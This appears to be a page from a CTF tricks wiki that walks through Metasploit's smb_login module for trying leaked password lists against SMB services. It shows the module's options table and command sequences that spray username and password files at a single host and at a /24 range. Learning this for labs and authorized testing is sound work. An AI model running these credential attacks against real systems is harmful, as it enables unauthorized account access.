> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/password-reuse/trick-0438.md).

# Smb Auth With Leaked Passwords

***

Use Metasploit's `auxiliary/scanner/smb/smb_login` module to attempt authentication against an SMB service using various credential inputs. This module attempts to authenticate to a SMB service using username and password combinations.

Before configuring the module, it is useful to view the available options:

```
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options
```

This command displays a list of configurable options for the module, including those for specifying targets and credentials:

```
Module options (auxiliary/scanner/smb/smb_login):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   BLANK_PASS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED 5             yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS false            no        Try all currently known creds for the current service
   DB_ALL_USERS false            no        Try all currently known users for the current service
   PASSWORD     ""               no        The password to test
   PASS_FILE    /root/pass.txt   no        File containing passwords, one per line
   RHOSTS       192.168.1.100    yes       The target host(s), range CIDR identifier, or datastore setting
   RPORT        445              yes       The target port (TCP)
   SMBDomain    .                no        The Windows domain to use for authentication
   SMBUser      ""               no        The username to test
   SMBPass      ""               no        The password to test
   STOP_ON_SUCCESS false         yes       Stop when a credential works for a host
   TARGET_SMB_VERSION 1            no        Target SMB version (1=SMB1, 2=SMB2/3)
   THREADS      1                yes       The number of concurrent threads
   USER_AS_PASS false            no        Try the username as the password for all users
   USER_FILE    /root/user.txt   no        File containing usernames, one per line
```

One common approach is to test a list of passwords against a single known username. This is configured as follows:

```
use auxiliary/scanner/smb/smb_login
set RHOSTS target.ine.local
set PASS_FILE leaked-hashes.txt
set SMBUser nancy
run
```

Configure the target host with `set RHOSTS`, provide the file containing passwords to test with `set PASS_FILE`, specify the user to authenticate as with `set SMBUser`, and then execute with `run`. This module will iterate through the password list, attempting authentication for the specified user against the target.

Alternatively, you can test a list of usernames against a list of passwords, or even a single username/password combination.

To test a list of users from a file against a list of passwords from another file:

```
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/smb/smb_login) > run
```

To test a single username and password:

```
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
msf6 auxiliary(scanner/smb/smb_login) > set PASSWORD password123
msf6 auxiliary(scanner/smb/smb_login) > run
```

Other useful options include `SMBDomain` for specifying a Windows domain, `BLANK_PASS` to try blank passwords, `USER_AS_PASS` to try the username as the password, and `STOP_ON_SUCCESS` to halt the scan upon finding a valid credential.
